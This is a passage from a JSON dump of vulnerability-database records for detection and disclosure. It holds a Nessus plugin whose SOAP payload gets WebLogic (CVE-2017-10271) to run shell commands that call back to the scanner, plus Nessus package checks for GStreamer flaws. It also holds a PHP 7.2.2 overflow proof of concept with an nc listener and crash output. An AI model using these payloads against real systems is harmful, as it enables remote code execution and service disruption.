although I think that is mostly paranoia.\nns_lookup = 'nslookup weblogic-2017-10271-' + pattern + ' ' + compat::this_host();\nxml_encoded_java =\n'<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">' +\n '<soapenv:Header>' +\n '<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">' +\n '<java>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>cmd.exe</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>/c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>ping -c 10 -p ' + pattern + ' ' + compat::this_host() + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '</java>' +\n '</work:WorkContext>' +\n '</soapenv:Header>' +\n '<soapenv:Body/>' +\n'</soapenv:Envelope>';\nrequest =\n 'POST /wls-wsat/CoordinatorPortType HTTP/1.1\\r\\n' +\n 'Host: ' + get_host_ip() + ':' + port + '\\r\\n' +\n 'Content-Type: text/xml\\r\\n' +\n 'Content-Length: ' + len(xml_encoded_java) + '\\r\\n' +\n '\\r\\n' +\n xml_encoded_java;\n\nsoc = open_sock_tcp(port);\nif (!soc)\n{\n audit(AUDIT_SOCK_FAIL, port, appname);\n}\n\nfilter = \"(ip and udp and port 53 
and src host \" + get_host_ip() + \") or (icmp and icmp[0] = 8 and src host \" + get_host_ip() + \")\";\nresponse = send_capture(socket:soc, data:request, pcap_filter:filter);\nclose(soc);\n\nif (empty_or_null(response))\n{\n # looks like we didn't execute anything on the host\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# We can directly search the DNS response\nif (pattern >!< response)\n{\n # maybe this is an ICMP response?\n icmp_data = tolower(hexstr(get_icmp_element(icmp:response, element:\"data\")));\n if (empty_or_null(icmp_data))\n {\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n }\n\n if (pattern >!< icmp_data)\n {\n # couldn't find the pattern in the ICMP data\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n } \n}\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-01T02:11:42", "bulletinFamily": "scanner", "description": "An update for gstreamer1-plugins-bad-free is now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGStreamer is a streaming media framework based on graphs of filters\nwhich operate on media data. 
The gstreamer1-plugins-bad-free package\ncontains a collection of plug-ins for GStreamer.\n\nSecurity Fix(es) :\n\n* An integer overflow flaw, leading to a heap-based buffer overflow,\nwas found in GStreamer", "modified": "2019-11-02T00:00:00", "id": "VIRTUOZZO_VZLSA-2017-0021.NASL", "href": "https://www.tenable.com/plugins/nessus/101404", "published": "2017-07-13T00:00:00", "title": "Virtuozzo 7 : gstreamer1-plugins-bad-free / etc (VZLSA-2017-0021)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101404);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/20 11:04:17\");\n\n script_cve_id(\n \"CVE-2016-9445\",\n \"CVE-2016-9809\",\n \"CVE-2016-9812\",\n \"CVE-2016-9813\"\n );\n\n script_name(english:\"Virtuozzo 7 : gstreamer1-plugins-bad-free / etc (VZLSA-2017-0021)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for gstreamer1-plugins-bad-free is now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGStreamer is a streaming media framework based on graphs of filters\nwhich operate on media data. The gstreamer1-plugins-bad-free package\ncontains a collection of plug-ins for GStreamer.\n\nSecurity Fix(es) :\n\n* An integer overflow flaw, leading to a heap-based buffer overflow,\nwas found in GStreamer's VMware VMnc video file format decoding\nplug-in. 
A remote attacker could use this flaw to cause an application\nusing GStreamer to crash or, potentially, execute arbitrary code with\nthe privileges of the user running the application. (CVE-2016-9445)\n\n* Multiple flaws were discovered in GStreamer's H.264 and MPEG-TS\nplug-ins. A remote attacker could use these flaws to cause an\napplication using GStreamer to crash. (CVE-2016-9809, CVE-2016-9812,\nCVE-2016-9813)\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-0021.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ef94c266\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-0021\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected gstreamer1-plugins-bad-free / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:gstreamer1-plugins-bad-free\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:gstreamer1-plugins-bad-free-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"gstreamer1-plugins-bad-free-1.4.5-6.vl7\",\n \"gstreamer1-plugins-bad-free-devel-1.4.5-6.vl7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-7\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gstreamer1-plugins-bad-free / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:03:45", "bulletinFamily": "scanner", "description": 
"According to the versions of the gstreamer1-plugins-bad-free package\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - An integer overflow flaw, leading to a heap-based\n buffer overflow, was found in GStreamer", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2017-1007.NASL", "href": "https://www.tenable.com/plugins/nessus/99853", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP2 : gstreamer1-plugins-bad-free (EulerOS-SA-2017-1007)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99853);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/14 14:36:22\");\n\n script_cve_id(\n \"CVE-2016-9445\",\n \"CVE-2016-9809\",\n \"CVE-2016-9812\",\n \"CVE-2016-9813\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : gstreamer1-plugins-bad-free (EulerOS-SA-2017-1007)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the gstreamer1-plugins-bad-free package\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - An integer overflow flaw, leading to a heap-based\n buffer overflow, was found in GStreamer's VMware VMnc\n video file format decoding plug-in. A remote attacker\n could use this flaw to cause an application using\n GStreamer to crash or, potentially, execute arbitrary\n code with the privileges of the user running the\n application. (CVE-2016-9445)\n\n - Multiple flaws were discovered in GStreamer's H.264 and\n MPEG-TS plug-ins. 
A remote attacker could use these\n flaws to cause an application using GStreamer to crash.\n (CVE-2016-9809, CVE-2016-9812, CVE-2016-9813)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1007\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51ff6a7f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected gstreamer1-plugins-bad-free packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:gstreamer1-plugins-bad-free\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"gstreamer1-plugins-bad-free-1.4.5-6\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \" gstreamer1-plugins-bad-free\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:03:45", "bulletinFamily": "scanner", "description": "According to the versions of the gstreamer1-plugins-bad-free package\ninstalled, the EulerOS installation on the remote host is affected by\nthe following 
vulnerabilities :\n\n - An integer overflow flaw, leading to a heap-based\n buffer overflow, was found in GStreamer", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2017-1008.NASL", "href": "https://www.tenable.com/plugins/nessus/99854", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : gstreamer1-plugins-bad-free (EulerOS-SA-2017-1008)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99854);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/14 14:36:22\");\n\n script_cve_id(\n \"CVE-2016-9445\",\n \"CVE-2016-9809\",\n \"CVE-2016-9812\",\n \"CVE-2016-9813\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : gstreamer1-plugins-bad-free (EulerOS-SA-2017-1008)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the gstreamer1-plugins-bad-free package\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - An integer overflow flaw, leading to a heap-based\n buffer overflow, was found in GStreamer's VMware VMnc\n video file format decoding plug-in. A remote attacker\n could use this flaw to cause an application using\n GStreamer to crash or, potentially, execute arbitrary\n code with the privileges of the user running the\n application. (CVE-2016-9445)\n\n - Multiple flaws were discovered in GStreamer's H.264 and\n MPEG-TS plug-ins. A remote attacker could use these\n flaws to cause an application using GStreamer to crash.\n (CVE-2016-9809, CVE-2016-9812, CVE-2016-9813)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?74dd7c95\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected gstreamer1-plugins-bad-free packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:gstreamer1-plugins-bad-free\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"gstreamer1-plugins-bad-free-1.4.5-6\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gstreamer1-plugins-bad-free\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2018-06-06T12:20:24", "bulletinFamily": "exploit", "description": "PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow. CVE-2018-7584. 
Dos exploit for PHP platform", "modified": "2018-06-06T00:00:00", "published": "2018-06-06T00:00:00", "id": "EDB-ID:44846", "href": "https://www.exploit-db.com/exploits/44846/", "type": "exploitdb", "title": "PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow", "sourceData": "Description:\r\n------------\r\nThe latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at:\r\n\r\nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n\r\n\t\t\tif (tmp_line[tmp_line_len - 1] == '\\n') {\r\n\t\t\t\t--tmp_line_len;\r\n\t\t\t\tif (tmp_line[tmp_line_len - 1] == '\\r') {\r\n\t\t\t\t\t--tmp_line_len;\r\n\t\t\t\t}\r\n}\r\n\r\nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed.\r\n\r\n$ bin/php --version\r\nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS )\r\nCopyright (c) 1997-2018 The PHP Group\r\nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies\r\n\r\n\r\nTest script:\r\n---------------\r\n$ xxd -g 1 poc\r\n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100..\r\n\r\n$ nc -vvlp 8080 < poc\r\nListening on [0.0.0.0] (family 0, port 8080)\r\nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083)\r\nGET / HTTP/1.0\r\nHost: localhost:8080\r\nConnection: close\r\n\r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n\r\nExpected result:\r\n----------------\r\nNO CRASH\r\n\r\nActual result:\r\n--------------\r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n=================================================================\r\n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac\r\nREAD of size 1 at 0xbfc038ef thread 
T0\r\n #0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n #1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979\r\n #2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027\r\n #3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550\r\n #4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224\r\n #5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573\r\n #6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731\r\n #7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760\r\n #8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082\r\n #9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123\r\n #10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134\r\n #11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042\r\n #12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404\r\n #13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)\r\n #14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0)\r\nAddress 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack:\r\n This frame has 13 object(s):\r\n [32, 36) 'transport_string'\r\n [96, 100) 'errstr'\r\n [160, 164) 'http_header_line_length'\r\n [224, 232) 'timeout'\r\n [288, 296) 'req_buf'\r\n [352, 360) 'tmpstr'\r\n [416, 432) 'ssl_proxy_peer_name'\r\n [480, 496) 'http_header'\r\n [544, 576) 'buf'\r\n [608, 736) 'tmp_line'\r\n [768, 1792) 'location'\r\n [1824, 2848) 'new_path'\r\n [2880, 3904) 'loc_path'\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* 
supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex\r\nShadow bytes around the buggy address:\r\n 0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4\r\n 0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00\r\n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00\r\n 0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2\r\n 0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap righ redzone: fb\r\n Freed Heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==26249== ABORTING\r\nAborted", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44846/"}, {"lastseen": "2017-11-03T20:31:35", "bulletinFamily": "exploit", "description": "GraphicsMagick - Memory Disclosure / Heap Overflow. CVE-2017-16352,CVE-2017-16353. 
Dos exploit for Multiple platform", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "id": "EDB-ID:43111", "href": "https://www.exploit-db.com/exploits/43111/", "type": "exploitdb", "title": "GraphicsMagick - Memory Disclosure / Heap Overflow", "sourceData": "'''Vulnerabilities summary\r\nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick.\r\n\r\nGraphicsMagick is \u201cThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeler\u2019s SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.\u201d\r\n\r\nThe vulnerabilities found are:\r\n\r\nMemory Information Disclosure\r\nHeap Overflow\r\nCredit\r\nAn independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n\r\nVendor response\r\nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18).\r\n\r\nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt\r\n\r\n\r\nVulnerabilities details\r\n\r\nMemory Information Disclosure\r\nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in DescribeImage function of the magick/describe.c file.\r\n\r\nThe portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image.\r\n\r\nThis vulnerability can be triggered with a specially crafted MIFF file.\r\n\r\nThe code which triggers the vulnerable code path is:\r\n\r\n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file,\r\n64 const MagickBool verbose)\r\n65 
